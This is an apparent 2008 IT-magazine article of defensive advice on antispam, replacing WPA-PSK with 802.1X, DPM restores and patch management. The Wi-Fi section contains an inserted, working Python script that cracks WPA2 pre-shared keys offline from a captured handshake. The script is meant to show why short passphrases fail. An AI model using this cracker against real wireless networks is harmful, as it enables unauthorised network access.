As seductive as the idea of a Bayesian-based,
"self-learning" antispam solution is, I've had
better luck with frequently updated signature-based spam-detection solutions. Like antivirus
solutions, signature-based spam-detection solutions require the vendor to constantly monitor messages, quickly update their signature
database, and just as quickly push the updated
file to their customers. Microsoft Exchange Intelligent Message Filter (IMF) would be a much
better solution if Microsoft updated it more
frequently. I always see a dramatic drop in spam after I install an IMF update, but the amount of
uncaught spam immediately begins to climb.
Other signature-based spam solutions, such as
St. Bernard Software's ePrism, are much more
frequently updated. There are also a number
of antispam services available that relieve you
from installing and maintaining any software by
routing your mail through the antispam service's
servers first.
Perhaps the biggest risk in implementing
an antispam solution is the potential increase
in support calls from users trying to find email
messages that were apparently eaten by the
antispam solution. Any solution that requires
you to get involved when a user needs to
retrieve a false positive is more trouble than
it's worth. My advice is to install only antispam
solutions that make all email identified as
spam easily accessible to the user—preferably
without leaving the email client. As examples,
you can configure both IMF and GFI Software's GFI MailEssentials to put all spam into
the recipient's junk email folder. Even better,
GFI MailEssentials lets you specify a different
folder for each antispam method it supports,
so you can determine which method (e.g.,
Bayesian, SPF, Realtime Blackhole List—RBL)
is responsible for misclassifying a good email
message by the folder in which it ends up.
Wi-Fi Security
Most organizations I run into are still using the
Wired Equivalent Privacy (WEP) standard or
Wi-Fi Protected Access (WPA) pre-shared keys
to secure their wireless LANs (WLANs). WEP
isn't secure no matter how strong your shared
key is, because of vulnerabilities in the protocol
and in the way it uses the RC4 algorithm: the
key itself can be recovered from captured traffic. WPA and WPA2
pre-shared keys are secure only if they are at
least 22 characters long and drawn from a large
character set. The reason is that anyone who captures
the four-way handshake between a client and an AP
can test passphrase guesses offline, with no further
contact with your network, so the passphrase must
withstand a dictionary attack. Long shared keys, though, are an
annoying, time-sapping problem for IT staff
and users because of all the management and
security issues that arise. Users can't remember them, so you're constantly asked for the
key, and frighteningly few users seem capable
of typing more than a few characters correctly
in sequence. Whenever a new computer is
commissioned or a contractor comes in, you
must get them access to the WLAN. And what
happens if a pre-shared key is compromised?
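To make concrete why passphrase strength is the whole game with WPA-PSK, here is an added example in Python (not code from the original article): it reimplements the PMK, PTK and EAPOL-Key MIC computations from IEEE 802.11i and runs an offline dictionary attack against a four-way handshake. The handshake is constructed inside the script from a known passphrase; the SSID, MAC addresses, nonces and wordlist are all made up, and the frame is laid out as message 2 of a WPA2/CCMP handshake (key descriptor version 2, HMAC-SHA1-128 MIC). The only value taken from outside is the PMK test vector published in the standard (passphrase "password", SSID "IEEE").

```python
"""Offline dictionary attack on a WPA2-PSK four-way handshake.

Added example for this article, not the author's code.  The handshake is
CONSTRUCTED below from a known passphrase (there is no real capture), so
the script first plays the supplicant and then plays the attacker.
"""
import hashlib
import hmac

MIC_OFFSET = 81  # MIC field position in an EAPOL-Key frame (802.11i layout)


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    The 4096 iterations are the only cost per guess; nothing else in the
    scheme depends on a secret the attacker does not already hold."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b""
    for i in range(4):  # 4 x 20 bytes = 80 bytes, truncated to 64
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK, both MAC addresses and both nonces (all public)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 MIC: HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 with an empty MIC field.

    Layout: ver(1) type(1) len(2) | desc(1) keyinfo(2) keylen(2) replay(8)
    nonce(32) iv(16) rsc(8) id(8) mic(16) datalen(2)  -> 99 bytes total."""
    body = (b"\x02"           # descriptor type 2 = RSN (WPA2)
            + b"\x01\x0a"     # key info: version 2, pairwise, MIC bit set
            + b"\x00\x00"     # key length (0 in message 2)
            + bytes(8)        # replay counter
            + snonce
            + bytes(16) + bytes(8) + bytes(8)   # IV, RSC, ID (unused here)
            + bytes(16)       # MIC placeholder
            + b"\x00\x00")    # key data length 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def supplicant_sign(passphrase, ssid, aa, spa, anonce, snonce) -> bytes:
    """What the client does: derive the KCK and stamp the MIC into message 2."""
    eapol = build_eapol_msg2(snonce)
    ptk = wpa_ptk(wpa_pmk(passphrase, ssid), aa, spa, anonce, snonce)
    mic = eapol_mic(ptk[:16], eapol)  # KCK is the first 16 bytes of the PTK
    return eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol, wordlist):
    """What the attacker does, offline, with nothing but the captured frame."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for guess in wordlist:
        kck = wpa_ptk(wpa_pmk(guess, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), captured_mic):
            return guess
    return None


# Constructed scenario (made-up SSID, MACs, nonces and wordlist).
SSID = "corp-wlan"
AP_MAC = bytes.fromhex("001122aabbcc")
CLIENT_MAC = bytes.fromhex("66778899ddee")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "letmein", "Summer2008", "corp-wlan"]


def demo(true_passphrase: str = "Summer2008"):
    """Sign a handshake with the real passphrase, then try to recover it."""
    eapol = supplicant_sign(true_passphrase, SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    return crack_psk(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, eapol, WORDLIST)


if __name__ == "__main__":
    # Sanity check against the 802.11i Annex H test vector.
    assert wpa_pmk("password", "IEEE").hex().startswith("f42c6fc5")
    print("recovered passphrase:", demo())           # Summer2008
    print("strong passphrase:", demo("xK9#vLq2!mR7$wP4@nZ6&hB3"))  # None
```

Nothing in the loop touches the network: once the handshake is captured, the cost per guess is the 4096-iteration PBKDF2 in wpa_pmk, so only the passphrase's length and character set protect you, and a leaked PSK has to be rotated on every AP and client at once. With 802.1X the PMK is generated per session inside the EAP exchange (for PEAP, from the TLS tunnel), so a captured handshake gives an attacker nothing to guess against.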
The solution is elimination. Get rid of WPA
with pre-shared keys (WPA-PSK). No, not
WPA altogether, just the PSK part. Implement
802.1X in place of pre-shared key authentication. With 802.1X, you configure your Access
Points (APs) to interface with Active Directory
(AD) via Remote Authentication Dial-In User
Service (RADIUS) to authenticate users and
computers based on their AD credentials. You
have to install Internet Authentication Service
(IAS) on one of your Windows servers, such
as a domain controller (DC); IAS is Windows'
built-in RADIUS server. After installing IAS, you
introduce the APs and IAS to each other with
some simple configuration settings (each AP becomes
a RADIUS client of IAS with its own shared secret), and in no
time your Windows wireless clients will begin
authenticating to your WLAN by using either
the computer's or the user's credentials.
By applying a few Group Policy settings, you
can make the authentication process transparent to users of computers that belong to your
domain. Outside users such as contractors and
consultants that need access to your WLAN simply need to enter the user name and password
of an AD account that you provide them. IAS
allows you to limit access to the WLAN and internal
wired networks based on group membership,
which allows you to restrict external consultants to Internet-only access, for instance. One
caveat: the usual EAP method for this setup, PEAP with
MS-CHAPv2, is only as safe as the client's validation of
the RADIUS server's certificate. Use the same Group Policy
to make clients validate the server certificate and accept only
your named RADIUS server; otherwise a rogue AP with its own
RADIUS server can collect your users' MS-CHAPv2 responses. For
detailed directions for implementing 802.1X on
your WLAN, see the Windows IT Security article
"Reaping the Benefits of WPA and PEAP," June
2006, InstantDoc ID 50105. By replacing WPA-PSK with 802.1X, you leverage the user accounts
you already manage in AD and eliminate the
headaches of pre-shared keys.
Restoring Files
Backup and recovery is very much a part of
information security, even if it isn't the first
thing you think of. There's nothing more
annoying than being close to a new high score
on your favorite computer game when an
inconsiderate user calls up whining about a file
he needs restored. While mourning your dead
game avatar, you must rouse from the comfortable environs of your cubicle, find the appropriate tape, restore the file, inform the user, and
repeat the process when he decides he really
needed a version from a week earlier.
Stop the insanity! Get Microsoft System
Center Data Protection Manager (DPM), and
put users in control of their own restores—right
from Windows Explorer. After you install a
DPM server and the associated agent on your
file server, DPM periodically synchronizes a replica
of the protected volumes to disk on the DPM server
and takes shadow copies of that replica, so it efficiently
stores multiple versions of each file online. (DPM's
Microsoft SQL Server database holds its configuration
and catalog, not the file data itself.) After you push out a necessary hotfix explained in the Microsoft article "How
to use the End User Recovery functionality
of Data Protection Manager in Windows XP"
(http://support.microsoft.com/kb/895536) to
your Windows XP clients, users will be able to
browse available backup versions of any file
on the server directly from Windows Explorer. To facilitate offsite backups of your data, DPM
lets you back up the shadow copies of your file
servers from the DPM server with your existing tape
backup software, giving you a
disk-to-disk-to-tape backup scenario. To learn
more about DPM, go to http://www.microsoft.com
Patch Management
Patch Tuesday is many administrators' least
favorite day of the month. And zero-day vulnerabilities are rearing their ugly heads more
frequently between Patch Tuesdays. I have
three recommendations for making your
patch-management effort less of a nightmare:
- Life is too short to push out patches manually. Implement Windows Server Update
Services (WSUS) or another automated
patch-management solution. WSUS is free,
but many excellent ISV offerings go beyond
WSUS's functionality, providing broader
platform and application support and better manageability, including those from St.
Bernard Software, PatchLink, BigFix, Shavlik
Technologies, and ScriptLogic.
- Many administrators are reluctant to push
out a patch without testing it, but testing is time-consuming and annoying. In addition, the user community usually identifies
defective patches soon after their release.
Organizations with a small IT staff might
consider just sitting on patches a couple of
days and monitoring for any advisories or
revisions from Microsoft, then deploying
them without formal testing. Even then, WSUS
computer groups let you approve a patch for a
small pilot group of ordinary workstations first
and for everyone else a day or two later, which
costs almost nothing and catches the patch that
breaks your line-of-business application before
it breaks it everywhere.
- An especially annoying type of vulnerability
is one for which no patch is available: a zero-day vulnerability. Most zero-day exploits
are related either to a specific file type (e.g., .doc, .xls, .ppt, .bmp, .png) or to a Microsoft Internet Explorer (IE) ActiveX control. More
and more antivirus vendors quickly release
signature updates for file-format exploits
even though they aren't, strictly speaking,
viruses. If you cover your file-borne vectors
(principally email attachments and Web
downloads) with multiple antivirus engines, you'll often be protected against these file-borne zero-day exploits well ahead of patch
availability. The easiest way to address
ActiveX-related vulnerabilities is to set the
kill bit on the ActiveX control, which tells IE
never to load it: a Compatibility Flags DWORD
value of 0x400 under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID of the control},
as described in the Microsoft article at
http://support.microsoft.com/kb/240797. The control
stays installed, so the kill bit has to be set before
users hit the exploit page, not after. I've created
an administrative template that you can use
with Group Policy to automatically set the
kill bit for an ActiveX control on thousands
of computers in a short time. The template
and a video demonstrating how to set it up
can be found at http://www.ultimatewindowssecurity.com/killbit.asp.
Take Action
In the case of many security annoyances,
the key is to automate or implement newer
technologies, but often such projects are put
off because of the initial setup involved or
the purchase costs. However, failing to solve
problems and automate tasks leads to a less
and less productive IT department that moves
in slower and slower motion, dragged down by
outdated, manual procedures. The IT department that succeeds in climbing the steep,
initial curve to eliminating IT headaches such
as those in this article will reap the benefits in
the long run. A few weekends at the office now
can save you many evenings and weekends in
the future.
afotakel June 11, 2008